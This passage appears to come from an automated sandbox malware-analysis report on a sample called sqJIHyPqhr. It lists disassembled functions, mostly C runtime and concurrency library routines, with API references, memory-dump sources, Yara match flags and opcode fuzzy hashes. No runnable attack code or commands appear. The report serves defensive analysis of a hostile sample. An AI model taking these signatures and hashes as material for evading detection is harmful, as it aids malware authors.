Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 024C2B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 024C2BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024C2BCF

Part of subcall function 024B8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024B86A8
Part of subcall function 024B8687: Hash.LIBCMT ref: 024B86E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024C2BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024C2BF8

Part of subcall function 024BF6DF: Hash.LIBCMT ref: 024BF6F1

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 9830d28ee56cb83da3187a44ff44ae78c7ec6b5f86b5e4074c4520d4fafb5f72
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 82012D76400604ABC715DF6AC881EDAF7E9FF58710F108A1EE55A87550DBB0F544CF60

Function 024A50CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024A50D1

Part of subcall function 024ABDAE: __EH_prolog3_GS.LIBCMT ref: 024ABDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 024A511C
__Getcoll.LIBCPMT ref: 024A512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A513B

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 1278e48d33d17da6739158dad9f9efbb80f4788ec16d9928856ea121f5172e9f
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: 540165B1D10208AFEB01EFA5C4A0BADB7B1FF64316F50802FD055AB280DB749544CFA1

Function 024A5B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024A5B8D

Part of subcall function 024ABDAE: __EH_prolog3_GS.LIBCMT ref: 024ABDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 024A5BD8
__Getcoll.LIBCPMT ref: 024A5BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A5BF7

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 50602bb7f60c363817f15a9883b04c6af86cea9b72a2fd49315f2a809f593f15
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: 44018C71D002089FEB00EFA5C590BDEB7B1BF24315F50802FD0556B280DB789544CF90

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 024BC13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC1A4

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: c25cf8382e5d33e1bc41851430a8bec3823c6e0856d03d6e102edd94d0624df2
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 7501A47A404149AFDF139E94DCC18EE3B66AF26250F048517F92898160D732C6B2AEA1

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 024B3773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024B378C

Part of subcall function 024B2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024B2B2C
Part of subcall function 024B2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024B2B4B

GetLastError.KERNEL32 ref: 024B37A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B37BE
__CxxThrowException@8.LIBVCRUNTIME ref: 024B37CC

Part of subcall function 024B28EC: SetThreadPriority.KERNEL32(?,?), ref: 024B28F8

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: e50b26587e9641a57ddd5e9943f368b74916581611cf6304207fef1205550856
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 9FF027B2A002153AD721FB774C06FFB3A9C9F00741F50096FB800E2580FED8D4008AB4

Function 024AD486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024B1342

Part of subcall function 024B0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024B0BD6
Part of subcall function 024B0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024B0BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024B1355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024B1361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024B136A

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: 095e2401f94d70ff0ee872cc53f753574b048cd83cea2197cacef3fbdfac6a75
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 56F0B431704704A7AF167EBA08205FF32975F51314B04516FE51AAF3C0EEB59D419BB4

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 024BD074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024BD088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024BD0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024BD0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 024BD0CD

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: c2aaed860c7d21b57304914db772e0df876c0bc76565e2076d1b31c0223ad55b
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 6CF05935E00604E3C326FA16D840CDFB37A8E90B1836085AFD80517285DB31A90BCE71

Function 024A5A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 024A5A83
__Cnd_signal.LIBCPMT ref: 024A5A8F
std::_Cnd_initX.LIBCPMT ref: 024A5AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024A5AAB

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: c973927cb99b8fc2ffbd03d401da7c06823b6166904e42d84b39928114e5b3d4
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 9BF0EC71500700DFEB217B73D82571A73B2AF10729F54441FE15A56D90CFB6E8145F55

Function 024B2858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024B286F
GetLastError.KERNEL32(?,?,?,?,024B8830,?,?,?,?,00000000,?,00000000), ref: 024B287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2894
__CxxThrowException@8.LIBVCRUNTIME ref: 024B28A2

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 9967320d5db67f8b7ae01e92bd3803c3fde72d9a8c0f00bfa163821ec9d11ef9
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 4EF0A03450010ABBCF01EFA5CD44EEF37B86F00701F200616B910E20A0DB74D6049B74

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 024B257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 024B2593
GetLastError.KERNEL32(?,?,?,?,?,024B0DA0), ref: 024B25A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B25B7
__CxxThrowException@8.LIBVCRUNTIME ref: 024B25C5

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 4628d8b34eb806b9520fbe780927e99b9b5d0a2c739c15815fb2164cc219af73
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 0CE0D86160021939E711F7764C16FBB369C9F10B41F54086ABD14E11C1FAD4D10049B5

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 024B9530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2959: TlsAlloc.KERNEL32(?,024B0DA0), ref: 024B295F

TlsAlloc.KERNEL32(?,024B0DA0), ref: 024C3BE6
GetLastError.KERNEL32 ref: 024C3BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024C3C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 024C3C1C

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: 72a6fef3d4d46ed66b2ad8c781c0e314e06e5dba782d2686abd27af070c0eada
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 04E0223C500202ABC300BF7B9C49ABF3A686A003417204A6FE529D21A1FA34D0068E78

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 024B2794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024B0DA0), ref: 024B279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024B0DA0), ref: 024B27AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B27C3
__CxxThrowException@8.LIBVCRUNTIME ref: 024B27D1

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 4364c471dd96eee7190f0fc8c0ed753d377b899bef2f532c57a16c0e14197e52
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: 7DE08078500109A7C701FBB6DD49EEF73BC6E00B05B600566B501E3550EB64D7048B79

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 024B28EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 024B28F8
GetLastError.KERNEL32 ref: 024B2904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B291A
__CxxThrowException@8.LIBVCRUNTIME ref: 024B2928

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 5d79487b336199347a8ce31bdac139994098b59f72d813aa7430faa8cb0d6e7b
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: A1E0863460010977CB15FF76CC05BFB376C6F04745B50092ABC19D20A0EB75D1148AB8

Function 024B29B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,024B7BD8,00000000,?,?,024B0DA0,?,?,?,00000000,?,00000000), ref: 024B29BE
